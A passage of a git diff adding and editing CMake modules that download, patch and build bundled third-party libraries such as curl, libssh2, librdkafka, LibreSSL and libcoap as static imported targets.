+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set variables
+    set(LIBARCHIVE_FOUND "YES" CACHE STRING "" FORCE)
+    set(LIBARCHIVE_INCLUDE_DIR "${BINARY_DIR}/thirdparty/libarchive-install/include" CACHE STRING "" FORCE)
+    set(LIBARCHIVE_LIBRARY "${BINARY_DIR}/thirdparty/libarchive-install/${BYPRODUCT}" CACHE STRING "" FORCE)
+    set(LIBARCHIVE_LIBRARIES ${LIBARCHIVE_LIBRARY} CACHE STRING "" FORCE)
+
+    # Create imported targets
+    add_library(libarchive STATIC IMPORTED)
+    set_target_properties(libarchive PROPERTIES IMPORTED_LOCATION "${LIBARCHIVE_LIBRARY}")
+    add_dependencies(libarchive libarchive-external)
+    file(MAKE_DIRECTORY ${LIBARCHIVE_INCLUDE_DIR})
+    set_property(TARGET libarchive APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${LIBARCHIVE_INCLUDE_DIR})
+endfunction(use_bundled_libarchive)
diff --git a/cmake/BundledLibCOAP.cmake b/cmake/BundledLibCOAP.cmake
new file mode 100644
index 0000000..7d52d5a
--- /dev/null
+++ b/cmake/BundledLibCOAP.cmake
@@ -0,0 +1,62 @@
+#
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+#
+
+function(use_bundled_libcoap SOURCE_DIR BINARY_DIR)
+    message("Using bundled libcoap")
+
+    # Define byproducts
+    if (WIN32)
+        set(BYPRODUCT "lib/libcoap-2.lib")
+    else()
+        set(BYPRODUCT "lib/libcoap-2.a")
+    endif()
+
+    # Build project
+    ExternalProject_Add(
+            coap-external
+            GIT_REPOSITORY "https://github.com/obgm/libcoap.git"
+            GIT_TAG "v4.2.0-rc2"
+            BUILD_IN_SOURCE true
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/libcoap-src"
+            BUILD_COMMAND make
+            CMAKE_COMMAND ""
+            UPDATE_COMMAND ""
+            INSTALL_COMMAND make install
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/libcoap-install/${BYPRODUCT}"
+            CONFIGURE_COMMAND ""
+            PATCH_COMMAND ./autogen.sh && ./configure --disable-examples --disable-dtls --disable-tests --disable-documentation --prefix=${BINARY_DIR}/thirdparty/libcoap-install
+            STEP_TARGETS build
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set variables
+    set(COAP_FOUND "YES" CACHE STRING "" FORCE)
+    set(COAP_INCLUDE_DIRS "${BINARY_DIR}/thirdparty/libcoap-install/include" CACHE STRING "" FORCE)
+    set(COAP_LIBRARY "${BINARY_DIR}/thirdparty/libcoap-install/${BYPRODUCT}" CACHE STRING "" FORCE)
+    set(COAP_LIBRARIES "${COAP_LIBRARY}" CACHE STRING "" FORCE)
+
+    # Create imported targets
+    file(MAKE_DIRECTORY ${COAP_INCLUDE_DIRS})
+
+    add_library(COAP::libcoap STATIC IMPORTED)
+    set_target_properties(COAP::libcoap PROPERTIES IMPORTED_LOCATION "${COAP_LIBRARY}")
+    add_dependencies(COAP::libcoap coap-external)
+    set_property(TARGET COAP::libcoap APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES "${COAP_INCLUDE_DIRS}")
+    set_property(TARGET COAP::libcoap APPEND PROPERTY INTERFACE_COMPILE_DEFINITIONS "WITH_POSIX=1")
+endfunction(use_bundled_libcoap)
diff --git a/cmake/BundledLibRdKafka.cmake b/cmake/BundledLibRdKafka.cmake
new file mode 100644
index 0000000..b83420a
--- /dev/null
+++ b/cmake/BundledLibRdKafka.cmake
@@ -0,0 +1,73 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_librdkafka SOURCE_DIR BINARY_DIR)
+    # Define patch step
+    set(PC "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/librdkafka/librdkafka-libressl.patch")
+
+    # Define byproducts
+    if(WIN32)
+        set(BYPRODUCT "lib/rdkafka.lib")
+    else()
+        set(BYPRODUCT "lib/librdkafka.a")
+    endif()
+
+    # Set build options
+    set(LIBRDKAFKA_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/librdkafka-install"
+            "-DWITH_SSL=ON"
+            "-DWITH_SASL=OFF"
+            "-DRDKAFKA_BUILD_STATIC=ON"
+            "-DRDKAFKA_BUILD_EXAMPLES=OFF"
+            "-DRDKAFKA_BUILD_TESTS=OFF"
+            "-DENABLE_LZ4_EXT=OFF"
+            "-DWITH_ZSTD=OFF"
+            "-DCMAKE_INSTALL_LIBDIR=lib"
+            "-DLIBRDKAFKA_STATICLIB=1")
+
+    append_third_party_passthrough_args(LIBRDKAFKA_CMAKE_ARGS "${LIBRDKAFKA_CMAKE_ARGS}")
+
+    # Build project
+    ExternalProject_Add(
+            kafka-external
+            URL "https://github.com/edenhill/librdkafka/archive/v1.0.1.tar.gz"
+            URL_HASH "SHA256=b2a2defa77c0ef8c508739022a197886e0644bd7bf6179de1b68bdffb02b3550"
+            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
+            CMAKE_ARGS ${LIBRDKAFKA_CMAKE_ARGS}
+            PATCH_COMMAND ${PC}
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/librdkafka-install/${BYPRODUCT}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set dependencies
+    add_dependencies(kafka-external OpenSSL::SSL OpenSSL::Crypto ZLIB::ZLIB)
+
+    # Set variables
+    set(LIBRDKAFKA_FOUND "YES" CACHE STRING "" FORCE)
+    set(LIBRDKAFKA_INCLUDE_DIR "${BINARY_DIR}/thirdparty/librdkafka-install/include/librdkafka" CACHE STRING "" FORCE)
+    set(LIBRDKAFKA_LIBRARY "${BINARY_DIR}/thirdparty/librdkafka-install/${BYPRODUCT}" CACHE STRING "" FORCE)
+    set(LIBRDKAFKA_LIBRARIES ${LIBRDKAFKA_LIBRARY} CACHE STRING "" FORCE)
+
+    # Create imported targets
+    add_library(librdkafka STATIC IMPORTED)
+    set_target_properties(librdkafka PROPERTIES IMPORTED_LOCATION "${LIBRDKAFKA_LIBRARY}")
+    add_dependencies(librdkafka kafka-external)
+    set_property(TARGET librdkafka APPEND PROPERTY INTERFACE_LINK_LIBRARIES OpenSSL::SSL OpenSSL::Crypto ZLIB::ZLIB)
+    file(MAKE_DIRECTORY ${LIBRDKAFKA_INCLUDE_DIR})
+    set_property(TARGET librdkafka APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${LIBRDKAFKA_INCLUDE_DIR})
+    set_property(TARGET librdkafka APPEND PROPERTY INTERFACE_COMPILE_DEFINITIONS "LIBRDKAFKA_STATICLIB=1")
+endfunction(use_bundled_librdkafka)
\ No newline at end of file
diff --git a/cmake/BundledLibSSH2.cmake b/cmake/BundledLibSSH2.cmake
new file mode 100644
index 0000000..f78aff1
--- /dev/null
+++ b/cmake/BundledLibSSH2.cmake
@@ -0,0 +1,79 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_libssh2 SOURCE_DIR BINARY_DIR)
+    message("Using bundled libssh2")
+
+    # Define patch step
+    set(PC "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/libssh2/libssh2-CMAKE_MODULE_PATH.patch")
+
+    # Define byproducts
+    get_property(LIB64 GLOBAL PROPERTY FIND_LIBRARY_USE_LIB64_PATHS)
+    if ("${LIB64}" STREQUAL "TRUE" AND (NOT WIN32 AND NOT APPLE))
+        set(LIBSUFFIX 64)
+    endif()
+
+    if (WIN32)
+        set(BYPRODUCT "lib/libssh2.lib")
+    else()
+        set(BYPRODUCT "lib${LIBSUFFIX}/libssh2.a")
+    endif()
+
+    # Set build options
+    set(LIBSSH2_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/libssh2-install"
+            -DENABLE_ZLIB_COMPRESSION=ON
+            -DCRYPTO_BACKEND=OpenSSL
+            -DBUILD_TESTING=OFF
+            -DBUILD_EXAMPLES=OFF)
+
+    append_third_party_passthrough_args(LIBSSH2_CMAKE_ARGS "${LIBSSH2_CMAKE_ARGS}")
+
+    # Build project
+    ExternalProject_Add(
+            libssh2-external
+            URL "https://www.libssh2.org/download/libssh2-1.8.2.tar.gz"
+            URL_HASH "SHA256=088307d9f6b6c4b8c13f34602e8ff65d21c2dc4d55284dfe15d502c4ee190d67"
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/libssh2-src"
+            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
+            CMAKE_ARGS ${LIBSSH2_CMAKE_ARGS}
+            PATCH_COMMAND ${PC}
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/libssh2-install/${BYPRODUCT}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set dependencies
+    add_dependencies(libssh2-external OpenSSL::Crypto ZLIB::ZLIB)
+
+    # Set variables
+    set(LIBSSH2_FOUND "YES" CACHE STRING "" FORCE)
+    set(LIBSSH2_INCLUDE_DIR "${BINARY_DIR}/thirdparty/libssh2-install/include" CACHE STRING "" FORCE)
+    set(LIBSSH2_LIBRARY "${BINARY_DIR}/thirdparty/libssh2-install/${BYPRODUCT}" CACHE STRING "" FORCE)
+
+    # Set exported variables for FindPackage.cmake
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_LIBSSH2_INCLUDE_DIR=${LIBSSH2_INCLUDE_DIR}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_LIBSSH2_LIBRARY=${LIBSSH2_LIBRARY}" CACHE STRING "" FORCE)
+
+    # Create imported targets
+    file(MAKE_DIRECTORY ${LIBSSH2_INCLUDE_DIR})
+
+    add_library(libssh2 STATIC IMPORTED)
+    set_target_properties(libssh2 PROPERTIES IMPORTED_LOCATION "${LIBSSH2_LIBRARY}")
+    add_dependencies(libssh2 libssh2-external)
+    set_property(TARGET libssh2 APPEND PROPERTY INTERFACE_LINK_LIBRARIES OpenSSL::Crypto ZLIB::ZLIB)
+    set_property(TARGET libssh2 APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${LIBSSH2_INCLUDE_DIR})
+endfunction(use_bundled_libssh2)
diff --git a/cmake/BundledLibUvc.cmake b/cmake/BundledLibUvc.cmake
new file mode 100644
index 0000000..e9b2043
--- /dev/null
+++ b/cmake/BundledLibUvc.cmake
@@ -0,0 +1,60 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_libuvc SOURCE_DIR BINARY_DIR)
+    find_package(PkgConfig)
+    pkg_check_modules(LIBUSB libusb-1.0)
+
+    # Define patch step
+    set(PC "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/libuvc/libuvc.patch")
+
+    # Define patch step
+    if (WIN32)
+        set(BYPRODUCT "lib/${CMAKE_LIBRARY_ARCHITECTURE}/libuvc.lib")
+    else()
+        set(BYPRODUCT "lib/${CMAKE_LIBRARY_ARCHITECTURE}/libuvc.a")
+    endif()
+
+    # Set build options
+    set(LIBUVC_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/libuvc-install")
+
+    # Build project
+    ExternalProject_Add(
+            libuvc-external
+            GIT_REPOSITORY "https://github.com/libuvc/libuvc.git"
+            GIT_TAG "v0.0.6"
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/libuvc-src"
+            CMAKE_ARGS ${LIBUVC_CMAKE_ARGS}
+            PATCH_COMMAND ${PC}
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/libuvc-install/${BYPRODUCT}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set variables
+    set(LIBUVC_FOUND "YES" CACHE STRING "" FORCE)
+    set(LIBUVC_INCLUDE_DIR "${BINARY_DIR}/thirdparty/libuvc-install/include" CACHE STRING "" FORCE)
+    set(LIBUVC_LIBRARY "${BINARY_DIR}/thirdparty/libuvc-install/${BYPRODUCT}" CACHE STRING "" FORCE)
+    set(LIBUVC_LIBRARIES ${LIBUVC_LIBRARY} CACHE STRING "" FORCE)
+
+    add_library(libuvc STATIC IMPORTED)
+    set_target_properties(libuvc PROPERTIES IMPORTED_LOCATION "${LIBUVC_LIBRARY}")
+    add_dependencies(libuvc libuvc-external)
+    file(MAKE_DIRECTORY ${LIBUVC_INCLUDE_DIR})
+    set_property(TARGET libuvc APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${LIBUVC_INCLUDE_DIR})
+    set_property(TARGET libuvc APPEND PROPERTY INTERFACE_LINK_LIBRARIES ${LIBUSB_LIBRARIES})
+endfunction(use_bundled_libuvc)
diff --git a/cmake/BundledLibcURL.cmake b/cmake/BundledLibcURL.cmake
new file mode 100644
index 0000000..1917d98
--- /dev/null
+++ b/cmake/BundledLibcURL.cmake
@@ -0,0 +1,106 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_curl SOURCE_DIR BINARY_DIR)
+    # Define patch step
+    if (WIN32)
+        set(PC "PATCH_COMMAND ./buildconf.bat")
+    endif()
+
+    # Define byproducts
+    get_property(LIB64 GLOBAL PROPERTY FIND_LIBRARY_USE_LIB64_PATHS)
+
+    if ("${LIB64}" STREQUAL "TRUE" AND (NOT WIN32 AND NOT APPLE))
+        set(LIBSUFFIX 64)
+    endif()
+
+    if (WIN32)
+        set(BYPRODUCT "lib/libcurl.lib")
+    else()
+        set(BYPRODUCT "lib${LIBSUFFIX}/libcurl.a")
+    endif()
+
+    # Set build options
+    set(CURL_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/curl-install"
+            -DCMAKE_POSITION_INDEPENDENT_CODE=ON
+            -DBUILD_CURL_EXE=OFF
+            -DBUILD_TESTING=OFF
+            -DBUILD_SHARED_LIBS=OFF
+            -DHTTP_ONLY=ON
+            -DCURL_DISABLE_CRYPTO_AUTH=ON
+            -DCURL_CA_PATH=none
+            -DCMAKE_USE_LIBSSH2=OFF
+            -DCMAKE_DEBUG_POSTFIX=
+            -DHAVE_GLIBC_STRERROR_R=1
+            -DHAVE_GLIBC_STRERROR_R__TRYRUN_OUTPUT=""
+            -DHAVE_POSIX_STRERROR_R=0
+            -DHAVE_POSIX_STRERROR_R__TRYRUN_OUTPUT=""
+            -DHAVE_POLL_FINE_EXITCODE=0
+            -DHAVE_FSETXATTR_5=0
+            -DHAVE_FSETXATTR_5__TRYRUN_OUTPUT=""
+            )
+    if (OPENSSL_OFF)
+        list(APPEND CURL_CMAKE_ARGS -DCMAKE_USE_OPENSSL=OFF)
+    else()
+        list(APPEND CURL_CMAKE_ARGS -DCMAKE_USE_OPENSSL=ON)
+    endif()
+
+    append_third_party_passthrough_args(CURL_CMAKE_ARGS "${CURL_CMAKE_ARGS}")
+
+    # Build project
+    ExternalProject_Add(
+            curl-external
+            URL "https://curl.haxx.se/download/curl-7.64.0.tar.gz"
+            URL_HASH "SHA256=cb90d2eb74d4e358c1ed1489f8e3af96b50ea4374ad71f143fa4595e998d81b5"
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/curl-src"
+            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
+            CMAKE_ARGS ${CURL_CMAKE_ARGS}
+            ${PC}
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/curl-install/${BYPRODUCT}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set dependencies
+    add_dependencies(curl-external ZLIB::ZLIB)
+    if (NOT OPENSSL_OFF)
+        add_dependencies(curl-external OpenSSL::SSL OpenSSL::Crypto)
+    endif()
+
+    # Set variables
+    set(CURL_FOUND "YES" CACHE STRING "" FORCE)
+    set(CURL_INCLUDE_DIR "${BINARY_DIR}/thirdparty/curl-install/include" CACHE STRING "" FORCE)
+    set(CURL_INCLUDE_DIRS "${CURL_INCLUDE_DIR}" CACHE STRING "" FORCE)
+    set(CURL_LIBRARY "${BINARY_DIR}/thirdparty/curl-install/${BYPRODUCT}" CACHE STRING "" FORCE)
+    set(CURL_LIBRARIES "${CURL_LIBRARY}" CACHE STRING "" FORCE)
+
+    # Set exported variables for FindPackage.cmake
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_CURL_INCLUDE_DIR=${CURL_INCLUDE_DIR}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_CURL_LIBRARY=${CURL_LIBRARY}" CACHE STRING "" FORCE)
+
+    # Create imported targets
+    file(MAKE_DIRECTORY ${CURL_INCLUDE_DIRS})
+
+    add_library(CURL::libcurl STATIC IMPORTED)
+    set_target_properties(CURL::libcurl PROPERTIES IMPORTED_LOCATION "${CURL_LIBRARY}")
+    add_dependencies(CURL::libcurl curl-external)
+    set_property(TARGET CURL::libcurl APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${CURL_INCLUDE_DIRS})
+    set_property(TARGET CURL::libcurl APPEND PROPERTY INTERFACE_LINK_LIBRARIES ZLIB::ZLIB)
+    if (NOT OPENSSL_OFF)
+        set_property(TARGET CURL::libcurl APPEND PROPERTY INTERFACE_LINK_LIBRARIES OpenSSL::SSL OpenSSL::Crypto)
+    endif()
+endfunction(use_bundled_curl SOURCE_DIR BINARY_DIR)
diff --git a/cmake/BundledLibreSSL.cmake b/cmake/BundledLibreSSL.cmake
new file mode 100644
index 0000000..6c52684
--- /dev/null
+++ b/cmake/BundledLibreSSL.cmake
@@ -0,0 +1,100 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_libre_ssl SOURCE_DIR BINARY_DIR)
+    message("Using bundled LibreSSL")
+
+    # Define byproducts
+    if (WIN32)
+        set(BYPRODUCT_PREFIX "" CACHE STRING "" FORCE)
+        set(BYPRODUCT_SUFFIX ".lib" CACHE STRING "" FORCE)
+    else()
+        set(BYPRODUCT_PREFIX "lib" CACHE STRING "" FORCE)
+        set(BYPRODUCT_SUFFIX ".a" CACHE STRING "" FORCE)
+    endif()
+
+    set(BYPRODUCTS
+            "lib/${BYPRODUCT_PREFIX}tls${BYPRODUCT_SUFFIX}"
+            "lib/${BYPRODUCT_PREFIX}ssl${BYPRODUCT_SUFFIX}"
+            "lib/${BYPRODUCT_PREFIX}crypto${BYPRODUCT_SUFFIX}"
+            )
+
+    set(LIBRESSL_BIN_DIR "${BINARY_DIR}/thirdparty/libressl-install" CACHE STRING "" FORCE)
+
+    FOREACH(BYPRODUCT ${BYPRODUCTS})
+        LIST(APPEND LIBRESSL_LIBRARIES_LIST "${LIBRESSL_BIN_DIR}/${BYPRODUCT}")
+    ENDFOREACH(BYPRODUCT)
+
+    # Set build options
+    set(LIBRESSL_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${LIBRESSL_BIN_DIR}"
+            -DLIBRESSL_APPS=OFF
+            -DLIBRESSL_TESTS=OFF
+            )
+
+    # Build project
+    ExternalProject_Add(
+        libressl-portable
+        URL https://cdn.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.3.tar.gz https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.3.tar.gz https://gentoo.osuosl.org/distfiles/libressl-2.8.3.tar.gz
+        URL_HASH "SHA256=9b640b13047182761a99ce3e4f000be9687566e0828b4a72709e9e6a3ef98477"
+        SOURCE_DIR "${BINARY_DIR}/thirdparty/libressl-src"
+        CMAKE_ARGS ${LIBRESSL_CMAKE_ARGS}
+        BUILD_BYPRODUCTS ${LIBRESSL_LIBRARIES_LIST}
+        EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set variables
+    set(OPENSSL_FOUND "YES" CACHE STRING "" FORCE)
+    set(OPENSSL_INCLUDE_DIR "${LIBRESSL_BIN_DIR}/include" CACHE STRING "" FORCE)
+    set(OPENSSL_LIBRARIES ${LIBRESSL_LIBRARIES_LIST} CACHE STRING "" FORCE)
+
+    # Set exported variables for FindPackage.cmake
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_OPENSSL_INCLUDE_DIR=${OPENSSL_INCLUDE_DIR}" CACHE STRING "" FORCE)
+    string(REPLACE ";" "%" OPENSSL_LIBRARIES_EXPORT "${OPENSSL_LIBRARIES}")
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_OPENSSL_LIBRARIES=${OPENSSL_LIBRARIES_EXPORT}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_OPENSSL_CRYPTO_LIBRARY=${LIBRESSL_BIN_DIR}/lib/${BYPRODUCT_PREFIX}crypto${BYPRODUCT_SUFFIX}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_OPENSSL_SSL_LIBRARY=${LIBRESSL_BIN_DIR}/lib/${BYPRODUCT_PREFIX}ssl${BYPRODUCT_SUFFIX}" CACHE STRING "" FORCE)
+
+    # Create imported targets
+    file(MAKE_DIRECTORY ${OPENSSL_INCLUDE_DIR})
+
+    add_library(OpenSSL::Crypto STATIC IMPORTED)
+    set_target_properties(OpenSSL::Crypto PROPERTIES
+            INTERFACE_INCLUDE_DIRECTORIES "${OPENSSL_INCLUDE_DIR}")
+    set_target_properties(OpenSSL::Crypto PROPERTIES
+            IMPORTED_LINK_INTERFACE_LANGUAGES "C"
+            IMPORTED_LOCATION "${LIBRESSL_BIN_DIR}/lib/${BYPRODUCT_PREFIX}crypto${BYPRODUCT_SUFFIX}")
+    add_dependencies(OpenSSL::Crypto libressl-portable)
+
+    add_library(OpenSSL::SSL STATIC IMPORTED)
+    set_target_properties(OpenSSL::SSL PROPERTIES
+            INTERFACE_INCLUDE_DIRECTORIES "${OPENSSL_INCLUDE_DIR}")
+    set_target_properties(OpenSSL::SSL PROPERTIES
+            IMPORTED_LINK_INTERFACE_LANGUAGES "C"
+            IMPORTED_LOCATION "${LIBRESSL_BIN_DIR}/lib/${BYPRODUCT_PREFIX}ssl${BYPRODUCT_SUFFIX}")
+    add_dependencies(OpenSSL::SSL libressl-portable)
+    set_property(TARGET OpenSSL::SSL APPEND PROPERTY INTERFACE_LINK_LIBRARIES OpenSSL::Crypto)
+
+    add_library(LibreSSL::TLS STATIC IMPORTED)
+    set_target_properties(LibreSSL::TLS PROPERTIES
+            INTERFACE_INCLUDE_DIRECTORIES "${OPENSSL_INCLUDE_DIR}")
+    set_target_properties(LibreSSL::TLS PROPERTIES
+            IMPORTED_LINK_INTERFACE_LANGUAGES "C"
+            IMPORTED_LOCATION "${LIBRESSL_BIN_DIR}/lib/${BYPRODUCT_PREFIX}tls${BYPRODUCT_SUFFIX}")
+    add_dependencies(LibreSSL::TLS libressl-portable)
+    set_property(TARGET LibreSSL::TLS APPEND PROPERTY INTERFACE_LINK_LIBRARIES OpenSSL::Crypto)
+endfunction(use_libre_ssl) 
diff --git a/cmake/BundledMbedTLS.cmake b/cmake/BundledMbedTLS.cmake
index 9407aed..aa1b239 100644
--- a/cmake/BundledMbedTLS.cmake
+++ b/cmake/BundledMbedTLS.cmake
@@ -66,12 +66,12 @@
     set(MBEDCRYPTO_LIBRARY "${MBEDTLS_BIN_DIR}/lib/${BYPRODUCT_PREFIX}mbedcrypto${BYPRODUCT_SUFFIX}" CACHE STRING "" FORCE)
 
     # Set exported variables for FindPackage.cmake
-    set(EXPORTED_MBEDTLS_INCLUDE_DIRS "${MBEDTLS_INCLUDE_DIRS}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_MBEDTLS_INCLUDE_DIRS=${MBEDTLS_INCLUDE_DIRS}" CACHE STRING "" FORCE)
     string(REPLACE ";" "%" MBEDTLS_LIBRARIES_EXPORT "${MBEDTLS_LIBRARIES}")
-    set(EXPORTED_MBEDTLS_LIBRARIES "${MBEDTLS_LIBRARIES_EXPORT}" CACHE STRING "" FORCE)
-    set(EXPORTED_MBEDTLS_LIBRARY "${MBEDTLS_LIBRARY}" CACHE STRING "" FORCE)
-    set(EXPORTED_MBEDX509_LIBRARY "${MBEDX509_LIBRARY}" CACHE STRING "" FORCE)
-    set(EXPORTED_MBEDCRYPTO_LIBRARY "${MBEDCRYPTO_LIBRARY}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_MBEDTLS_LIBRARIES=${MBEDTLS_LIBRARIES_EXPORT}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_MBEDTLS_LIBRARY=${MBEDTLS_LIBRARY}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_MBEDX509_LIBRARY=${MBEDX509_LIBRARY}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_MBEDCRYPTO_LIBRARY=${MBEDCRYPTO_LIBRARY}" CACHE STRING "" FORCE)
 
     # Create imported targets
     file(MAKE_DIRECTORY ${MBEDTLS_INCLUDE_DIRS})
diff --git a/cmake/BundledOSSPUUID.cmake b/cmake/BundledOSSPUUID.cmake
index 723633d..61c02dc 100644
--- a/cmake/BundledOSSPUUID.cmake
+++ b/cmake/BundledOSSPUUID.cmake
@@ -21,7 +21,6 @@
     message("Using bundled ossp-uuid")
 
     # Define patch step
-    find_package(Patch REQUIRED)
     set(PC "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/ossp-uuid/ossp-uuid-mac-fix.patch")
 
     # Define byproducts
diff --git a/cmake/BundledOpen62541.cmake b/cmake/BundledOpen62541.cmake
index b4fb2de..663d831 100644
--- a/cmake/BundledOpen62541.cmake
+++ b/cmake/BundledOpen62541.cmake
@@ -16,9 +16,6 @@
 # under the License.
 
 function(use_bundled_open62541 SOURCE_DIR BINARY_DIR)
-    # Find patch executable
-    find_package(Patch REQUIRED)
-
     # Define patch step
